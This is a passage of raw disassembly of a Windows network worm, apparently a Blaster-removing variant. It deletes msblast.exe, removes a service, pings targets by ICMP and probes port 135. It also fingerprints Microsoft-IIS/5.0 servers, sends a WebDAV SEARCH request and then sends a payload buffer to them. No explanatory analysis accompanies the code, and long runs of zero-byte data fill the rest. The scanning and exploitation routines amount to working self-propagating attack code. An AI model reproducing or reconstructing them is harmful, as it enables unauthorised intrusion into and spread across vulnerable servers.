add esp, 4
test eax, eax
jz short loc_402A48
push eax
push 0
push 1F0FFFh
call dword_404070 ; OpenProcess
mov esi, eax
test esi, esi
jz short loc_402A48
push 1
push esi
call dword_4040AC ; TerminateProcess
push 1388h
call dword_4040C8 ; Sleep
push esi
call dword_4040E0 ; CloseHandle
loc_402A48: ; CODE XREF: sub_402A00+17�j
; sub_402A00+2B�j
mov ecx, 41h
xor eax, eax
lea edi, [esp+110h+var_107]
mov [esp+110h+var_108], 0
rep stosd
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
lea eax, [esp+114h+var_108]
push offset aSMsblast_exe ; "%s\\msblast.exe"
push eax
call dword_40411C ; sprintf
add esp, 0Ch
lea ecx, [esp+110h+var_108]
push ecx
call dword_404074 ; GetFileAttributesA
pop edi
pop esi
test al, 1
jz short loc_402A91
and al, 0FEh
lea edx, [esp+108h+var_108]
push eax
push edx
call dword_404078 ; SetFileAttributesA
loc_402A91: ; CODE XREF: sub_402A00+81�j
lea eax, [esp+108h+var_108]
push eax
call dword_4040E8 ; DeleteFileA
add esp, 108h
retn
sub_402A00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402AB0 proc near ; CODE XREF: sub_402B20+26�p
; sub_402C40+27�p
arg_0 = dword ptr 4
push esi
push edi
call sub_403122 ; IcmpCreateFile
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_402AC3
pop edi
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_402AC3: ; CODE XREF: sub_402AB0+C�j
push 5Ch
push 40h
call dword_404068 ; GlobalAlloc
mov esi, eax
test esi, esi
jnz short loc_402ADE
push edi
call sub_40311C ; IcmpCloseHandle
pop edi
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_402ADE: ; CODE XREF: sub_402AB0+21�j
mov eax, [esp+8+arg_0]
push ebx
push 7D0h
push 5Ch
push esi
push 0
push 40h
push offset dword_406430
push eax
push edi
mov dword ptr [esi+10h], offset dword_406430
mov word ptr [esi+0Ch], 40h
call sub_403116 ; IcmpSendEcho
push esi
mov ebx, eax
call dword_40406C ; GlobalFree
push edi
call sub_40311C ; IcmpCloseHandle
mov eax, ebx
pop ebx
pop edi
pop esi
retn
sub_402AB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402B20 proc near ; DATA XREF: sub_401470+F0�o
var_414 = word ptr -414h
var_410 = dword ptr -410h
var_40C = dword ptr -40Ch
var_3FC = byte ptr -3FCh
arg_0 = dword ptr 4
sub esp, 414h
push ebp
push esi
push offset dword_4075A4
call dword_404088 ; InterlockedIncrement
mov dword ptr [esp+41Ch+var_414], 0BB8h
mov ebp, [esp+41Ch+arg_0]
mov esi, [ebp+0]
push esi
call sub_402AB0
add esp, 4
test eax, eax
jz loc_402C17
push 87h
mov word ptr [esp+420h+var_410], 2
mov [esp+420h+var_40C], esi
call dword_404174 ; ntohs
push 0
push 1
push 2
mov word ptr [esp+428h+var_410+2], ax
call dword_404150 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz loc_402C17
push ebx
push edi
lea eax, [esp+424h+var_410]
push 10h
push eax
push esi
call dword_404154 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_402C0E
mov ebx, dword_404168
push 0
push 48h
push offset dword_405434
push esi
call ebx ; dword_404168
cmp eax, 0FFFFFFFFh
jz short loc_402C0E
lea ecx, [esp+420h+var_410]
push 4
push ecx
push 1006h
push 0FFFFh
push esi
call dword_404164 ; setsockopt
mov edi, dword_40416C
push 0
lea edx, [esp+424h+var_3FC]
push 3E8h
push edx
push esi
call edi ; dword_40416C
cmp eax, 0FFFFFFFFh
jz short loc_402C0E
test eax, eax
jz short loc_402C0E
mov eax, dword_406420
push 0
push eax
push offset dword_406470
push esi
call ebx ; dword_404168
cmp eax, 0FFFFFFFFh
jz short loc_402C0E
push 0
lea ecx, [esp+424h+var_3FC]
push 400h
push ecx
push esi
call edi ; dword_40416C
loc_402C0E: ; CODE XREF: sub_402B20+7B�j
; sub_402B20+92�j ...
push esi
call dword_404170 ; closesocket
pop edi
pop ebx
loc_402C17: ; CODE XREF: sub_402B20+30�j
; sub_402B20+62�j
test ebp, ebp
jz short loc_402C24
push ebp
call sub_402FC6
add esp, 4
loc_402C24: ; CODE XREF: sub_402B20+F9�j
push offset dword_4075A4
call dword_404064 ; InterlockedDecrement
pop esi
xor eax, eax
pop ebp
add esp, 414h
retn 4
sub_402B20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402C40 proc near ; DATA XREF: sub_401470+E1�o
var_5AC = word ptr -5ACh
var_5A8 = dword ptr -5A8h
var_5A4 = dword ptr -5A4h
var_594 = byte ptr -594h
var_574 = byte ptr -574h
var_2B8 = byte ptr -2B8h
arg_0 = dword ptr 4
sub esp, 5ACh
push ebx
push ebp
push esi
push edi
push offset dword_4075A4
call dword_404088 ; InterlockedIncrement
mov dword ptr [esp+5BCh+var_5AC], 0BB8h
mov eax, [esp+5BCh+arg_0]
mov esi, [eax]
push esi
call sub_402AB0
add esp, 4
test eax, eax
jz loc_402EC5
push 50h
mov word ptr [esp+5C0h+var_5A8], 2
mov [esp+5C0h+var_5A4], esi
call dword_404174 ; ntohs
push 0
push 1
push 2
mov word ptr [esp+5C8h+var_5A8+2], ax
call dword_404150 ; socket
mov ebp, eax
cmp ebp, 0FFFFFFFFh
jz loc_402EC5
lea ecx, [esp+5BCh+var_5A8]
push 10h
push ecx
push ebp
call dword_404154 ; connect
cmp eax, 0FFFFFFFFh
jz loc_402EBE
push esi
call dword_40415C ; inet_ntoa
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
lea edx, [esp+5B8h+var_594]
repne scasb
not ecx
sub edi, ecx
push offset aConnectionKeep ; "\r\nConnection: Keep-Alive\r\n\r\n"
mov eax, ecx
mov esi, edi
mov edi, edx
lea edx, [esp+5BCh+var_574]
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
lea ecx, [esp+5BCh+var_594]
push ecx
push offset aGetHttp1_1Acce ; "GET / HTTP/1.1\r\nAccept: image/gif, imag"...
push offset aSSS ; "%s%s%s"
push edx
call dword_40411C ; sprintf
lea edi, [esp+5CCh+var_574]
or ecx, 0FFFFFFFFh
xor eax, eax
add esp, 14h
repne scasb
not ecx
dec ecx
push 0
lea eax, [esp+5BCh+var_574]
push ecx
push eax
push ebp
call dword_404168 ; send
cmp eax, 0FFFFFFFFh
jz loc_402EBE
mov ebx, dword_404164
lea ecx, [esp+5B8h+var_5A8]
push 4
push ecx
push 1006h
push 0FFFFh
push ebp
call ebx ; dword_404164
push 0
lea edx, [esp+5BCh+var_2B8]
push 2BBh
push edx
push ebp
call dword_40416C ; recv
cmp eax, 0FFFFFFFFh
jz loc_402EBE
test eax, eax
jz loc_402EBE
mov [esp+eax+5B8h+var_2B8], 0
lea eax, [esp+5B8h+var_2B8]
push offset aServerMicrosof ; "Server: Microsoft-IIS/5.0"
push eax
call dword_404100 ; strstr
add esp, 8
test eax, eax
jz loc_402EBE
push ebp
call dword_404170 ; closesocket
mov esi, dword_4040C8
push 64h
call esi ; dword_4040C8
push 0
push 1
push 2
call dword_404150 ; socket
mov ebp, eax
cmp ebp, 0FFFFFFFFh
jz loc_402EC5
lea ecx, [esp+5BCh+var_5A8]
push 10h
push ecx
push ebp
call dword_404154 ; connect
cmp eax, 0FFFFFFFFh
jz loc_402EBE
lea edx, [esp+5B8h+var_594]
lea eax, [esp+5B8h+var_574]
push edx
push offset aSearchHttp1_1H ; "SEARCH / HTTP/1.1\r\nHost: %s\r\n\r\n"
push eax
call dword_40411C ; sprintf
lea edi, [esp+5C4h+var_574]
or ecx, 0FFFFFFFFh
xor eax, eax
add esp, 0Ch
repne scasb
not ecx
dec ecx
push 0
push ecx
lea ecx, [esp+5C0h+var_574]
push ecx
push ebp
call dword_404168 ; send
cmp eax, 0FFFFFFFFh
jz loc_402EBE
lea edx, [esp+5B8h+var_5A8]
push 4
push edx
push 1006h
push 0FFFFh
push ebp
call ebx ; dword_404164
push 0
lea eax, [esp+5BCh+var_2B8]
push 63h
push eax
push ebp
call dword_40416C ; recv
cmp eax, 0FFFFFFFFh
jz short loc_402EBE
test eax, eax
jz short loc_402EBE
lea ecx, [esp+5B8h+var_2B8]
push offset a411 ; "411"
push ecx
mov [esp+eax+5C0h+var_2B8], 0
call dword_404100 ; strstr
add esp, 8
test eax, eax
jz short loc_402EBE
push ebp
call dword_404170 ; closesocket
push 64h
call esi ; dword_4040C8
push 0
push 1
push 2
call dword_404150 ; socket
mov ebp, eax
cmp ebp, 0FFFFFFFFh
jz short loc_402EC5
lea edx, [esp+5BCh+var_5A8]
push 10h
push edx
push ebp
call dword_404154 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_402EBE
push 64h
call esi ; dword_4040C8
mov edx, ds:dword_4075A0
or ecx, 0FFFFFFFFh
mov edi, edx
xor eax, eax
repne scasb
not ecx
dec ecx
push ecx
push edx
push ebp
call sub_402F50
add esp, 0Ch
push 0BB8h
call esi ; dword_4040C8
loc_402EBE: ; CODE XREF: sub_402C40+77�j
; sub_402C40+E9�j ...
push ebp
call dword_404170 ; closesocket
loc_402EC5: ; CODE XREF: sub_402C40+31�j
; sub_402C40+60�j ...
mov eax, [esp+5BCh+arg_0]
pop edi
pop esi
pop ebp
test eax, eax
pop ebx
jz short loc_402EDD
push eax
call sub_402FC6
add esp, 4
loc_402EDD: ; CODE XREF: sub_402C40+292�j
push offset dword_4075A4
call dword_404064 ; InterlockedDecrement
xor eax, eax
add esp, 5ACh
retn 4
sub_402C40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402F00 proc near ; CODE XREF: sub_401280+3C�p
; sub_401280+46�p
arg_0 = dword ptr 4
push esi
push edi
push 0F003Fh
push 0
push 0
call dword_40402C ; OpenSCManagerA
mov edi, eax
test edi, edi
jz short loc_402F4B
mov eax, [esp+8+arg_0]
push 0F01FFh
push eax
push edi
call dword_404038 ; OpenServiceA
mov esi, eax
test esi, esi
jnz short loc_402F38
push edi
call dword_404034 ; CloseServiceHandle
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_402F38: ; CODE XREF: sub_402F00+2C�j
push esi
call dword_40400C ; DeleteService
push esi
mov esi, dword_404034
call esi ; dword_404034
push edi
call esi ; dword_404034
loc_402F4B: ; CODE XREF: sub_402F00+15�j
pop edi
pop esi
retn
sub_402F00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402F50 proc near ; CODE XREF: sub_402C40+26F�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ecx
push ebx
push ebp
push esi
push edi
mov edi, [esp+14h+arg_8]
xor ebx, ebx
cmp edi, ebx
mov [esp+14h+var_4], edi
mov [esp+14h+arg_8], ebx
jle short loc_402FA3
mov ebp, [esp+14h+arg_4]
loc_402F6B: ; CODE XREF: sub_402F50+51�j
mov ecx, [esp+14h+arg_0]
push 0
lea eax, [ebx+ebp]
push edi
push eax
push ecx
call dword_404168 ; send
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_402FAD
test esi, esi
jnz short loc_402F9B
cmp [esp+14h+arg_8], 64h
jge short loc_402FAD
push 5
call dword_4040C8 ; Sleep
inc [esp+14h+arg_8]
loc_402F9B: ; CODE XREF: sub_402F50+36�j
sub edi, esi
add ebx, esi
test edi, edi
jg short loc_402F6B
loc_402FA3: ; CODE XREF: sub_402F50+15�j
mov eax, [esp+14h+var_4]
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_402FAD: ; CODE XREF: sub_402F50+32�j
; sub_402F50+3D�j
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
pop ecx
retn
sub_402F50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402FC0 proc near ; CODE XREF: sub_401280+8B�p
; sub_401470+9B�p ...
jmp dword_404108
sub_402FC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402FC6 proc near ; CODE XREF: sub_401C80+1EA�p
; sub_402B20+FC�p ...
jmp dword_404138
sub_402FC6 endp
; ---------------------------------------------------------------------------
loc_402FCC: ; CODE XREF: seg001:004091B8�j
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4041A8
push offset loc_403100
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 20h
push ebx
push esi
push edi
mov [ebp-18h], esp
and dword ptr [ebp-4], 0
push 1
call dword_404128 ; __set_app_type
pop ecx
or ds:dword_4076BC, 0FFFFFFFFh
or ds:dword_4076C0, 0FFFFFFFFh
call dword_404124 ; __p__fmode
mov ecx, ds:dword_4076B8
mov [eax], ecx
call dword_404118 ; __p__commode
mov ecx, ds:dword_4076B4
mov [eax], ecx
mov eax, dword_404114
mov eax, [eax]
mov ds:dword_4076C4, eax
call nullsub_1
cmp dword_406414, 0
jnz short loc_40304F
push offset sub_4030FA
call dword_404110 ; __setusermatherr
pop ecx
loc_40304F: ; CODE XREF: seg000:00403041�j
call sub_4030E8
push offset dword_40500C
push offset dword_405008
call sub_4030E2 ; _initterm
mov eax, ds:dword_4076B0
mov [ebp-28h], eax
lea eax, [ebp-28h]
push eax
push ds:dword_4076AC
lea eax, [ebp-20h]
push eax
lea eax, [ebp-2Ch]
push eax
lea eax, [ebp-1Ch]
push eax
call dword_4040F8 ; __getmainargs
push offset dword_405004
push offset dword_405000
call sub_4030E2 ; _initterm
call dword_40410C ; __p___initenv
mov ecx, [ebp-20h]
mov [eax], ecx
push dword ptr [ebp-20h]
push dword ptr [ebp-2Ch]
push dword ptr [ebp-1Ch]
call sub_4011C0
add esp, 30h
mov [ebp-24h], eax
push eax
call dword_4040F0 ; exit
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-30h], ecx
push eax
push ecx
call sub_4030DC ; _XcptFilter
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-30h]
call dword_404134 ; _exit
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4030DC proc near ; CODE XREF: seg000:004030C8�p
jmp dword_4040F4
sub_4030DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4030E2 proc near ; CODE XREF: seg000:0040305E�p
; seg000:00403091�p
jmp dword_4040FC
sub_4030E2 endp
; =============== S U B R O U T I N E =======================================
sub_4030E8 proc near ; CODE XREF: seg000:loc_40304F�p
push 30000h
push 10000h
call sub_403106 ; _controlfp
pop ecx
pop ecx
retn
sub_4030E8 endp
; =============== S U B R O U T I N E =======================================
sub_4030FA proc near ; DATA XREF: seg000:00403043�o
xor eax, eax
retn
sub_4030FA endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
align 10h
loc_403100: ; DATA XREF: seg000:00402FD6�o
jmp dword_40412C
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403106 proc near ; CODE XREF: sub_4030E8+A�p
jmp dword_404130
sub_403106 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403110 proc near ; CODE XREF: sub_4016E0+10�p
jmp dword_40419C
sub_403110 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403116 proc near ; CODE XREF: sub_402AB0+53�p
jmp dword_404058
sub_403116 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40311C proc near ; CODE XREF: sub_402AB0+24�p
; sub_402AB0+62�p
jmp dword_404050
sub_40311C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403122 proc near ; CODE XREF: sub_402AB0+2�p
jmp dword_404054
sub_403122 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403128 proc near ; CODE XREF: sub_401000+C0�p
jmp dword_4040DC
sub_403128 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40312E proc near ; CODE XREF: sub_401000+7C�p
jmp dword_4040D8
sub_40312E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403134 proc near ; CODE XREF: sub_401000+62�p
jmp dword_4040D4
sub_403134 endp
; ---------------------------------------------------------------------------
align 4
dd 0BBh dup(0)
db 0
byte_403429 db 0 ; DATA XREF: seg002:0040B948�r
; seg002:loc_40B962�r ...
byte_40342A db 0 ; DATA XREF: seg002:0040B994�r
; seg002:loc_40B9AF�r ...
byte_40342B db 0 ; DATA XREF: seg002:0040B8F2�r
; seg002:0040B8FB�r ...
db 3 dup(0)
byte_40342F db 0 ; DATA XREF: seg002:0040B8E4�r
; seg002:0040B905�r ...
byte_403430 db 0 ; DATA XREF: seg002:0040BB2A�r
; sub_40C1F9+73�w ...
dword_403431 dd 0 ; sub_40A38C+BE�r ...
dword_403435 dd 0 db 0
db 0
db 0
dword_40343C dd 0 ; seg002:loc_40BD78�r ...
dword_403440 dd 81h dup(0)
db 2 dup(0)
dword_403646 dd 0 dd 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dword_40384E dd 0 ; seg002:0040C168�r ...
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dword_403952 dd 0 ; sub_40C53F+53�r
dword_403956 dd 0 ; sub_40C003+73�r ...
dword_40395A dd 0 ; sub_40C53F+25�r
db 0
db 0
db 0
db 0
dword_403962 dd 0 ; sub_40C53F+2B�r
db 0
db 0
db 0
db 0
dword_40396A dd 0 ; sub_40C11A+36�r
dword_40396E dd 0 ; sub_40C53F:loc_40C558�r
dword_403972 dd 0 ; sub_40BF86-113�r ...
dword_403976 dd 0 ; sub_40C1F9+121�r ...
dword_40397A dd 0 ; sub_40C1F9+2D1�r
unk_40397E db 0 ; DATA XREF: sub_40C1F9+28C�r
db 0
db 2 dup(0)
dword_403982 dd 0 ; seg002:0040BCC1�r ...
dword_403986 dd 0 ; seg002:0040BDAF�r ...
dword_40398A dd 0 ; seg002:0040BB87�w ...
dword_40398E dd 0 ; sub_40B5BD+6�w ...
dword_403992 dd 0 dword_403996 dd 0 dword_40399A dd 0 ; seg002:0040BD20�r
dword_40399E dd 0 ; seg002:0040B8AF�r
dword_4039A2 dd 0 ; seg002:0040BD97�r
dword_4039A6 dd 0 ; sub_40B507+30�w ...
dword_4039AA dd 0 ; sub_40B507+36�w ...
dword_4039AE dd 0 ; sub_40BF86+4B�w ...
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dword_4039BE dd 0 dword_4039C2 dd 0 ; sub_40BF86-3B�r
dword_4039C6 dd 0 ; sub_40BF86-33�r
dword_4039CA dd 0 ; sub_40BF86-15�r
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
